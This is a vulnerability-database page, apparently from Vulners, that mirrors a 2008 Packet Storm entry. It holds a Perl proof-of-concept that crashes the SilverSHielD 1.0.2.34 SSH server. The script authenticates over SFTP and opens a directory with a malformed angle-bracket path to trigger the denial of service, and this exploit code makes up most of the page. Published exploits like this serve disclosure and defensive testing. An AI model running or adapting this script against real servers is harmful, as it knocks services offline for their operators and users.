Lucene search
K

silvershield-dos.txt

🗓️ 23 Oct 2008 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

SilverSHielD 1.0.2.34 denial of service attack using Perl script

Code
`#!/usr/bin/perl  
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]  
# SilverSHielD 1.0.2.34 DoS  
use Net::SSH2;  
  
$host = "192.168.0.111";  
$port = 22;  
$username = "test";  
$password = "test123";  
$dos = "<<<<<<<<<<>>>>>>>>>>";  
  
$ssh2 = Net::SSH2->new();  
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";  
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";  
$sftp = $ssh2->sftp();  
$rename = $sftp->opendir($dos);  
$ssh2->disconnect();  
exit;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
29